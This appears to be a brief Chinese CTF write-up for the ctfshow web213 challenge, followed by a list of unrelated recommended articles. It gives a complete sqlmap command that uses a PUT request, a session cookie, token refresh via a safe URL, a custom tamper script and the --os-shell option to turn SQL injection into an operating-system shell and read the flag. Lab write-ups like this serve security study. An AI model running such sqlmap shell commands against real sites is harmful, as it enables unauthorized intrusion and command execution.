ctfshow-web213

爱隐身的官人2025-11-11 17:56

-os--shell参数的使用

复制代码 
python sqlmap.py -u "http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web212.py --os-shell

有两个地方需要进行选择:如果是PHP则直接回车默认选择。

这两个地方需要选择正确才能拿到shell。

读取flag。

相关推荐
曲幽2 天前
FastAPI自动生成的API文档太丑?我花了一晚上把它改成了客户愿意付费的样子
python·fastapi·web·swagger·openapi·scalar·docs
曲幽3 天前
告别手写 API 胶水代码:FastAPI 与 Vue 的“契约自动机” OpenAPI 实战
python·typescript·vue·fastapi·web·swagger·openapi·codegen
里欧跑得慢4 天前
Flutter 导航路由:构建流畅的应用导航体验
前端·css·flutter·web
数据知道4 天前
claw-code 源码详细分析:Command Graph 分段——复杂 CLI 产品如何把命令关系从脑子里搬到纸上?
ai·web·claw code
曲幽5 天前
FastAPI + Vue 前后端分离实战:我的项目结构“避坑指南”
python·vue·fastapi·web·vite·proxy·cors·env
johnny2335 天前
Web分析平台:Web Check、LogX、IP Insight
web
REDcker5 天前
WebXR 技术详解:标准、生态与开发入门
浏览器·web
数据知道6 天前
claw-code 源码详细分析:Route / Bootstrap / Tool-Pool——把提示词映射到「可执行面」的分层策略
网络·ai·web·claude code
数据知道6 天前
claw-code 源码详细分析:Parity Audit——如何用工程对比把「像不像」从口水战变成可重复报告?
ai·web·claw code
糕冷のkecy7 天前
[ZJCTF 2019]NiZhuanSiWei
web
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南07实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了08UV安装并设置国内源09AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析10Oh My Codex 快速使用指南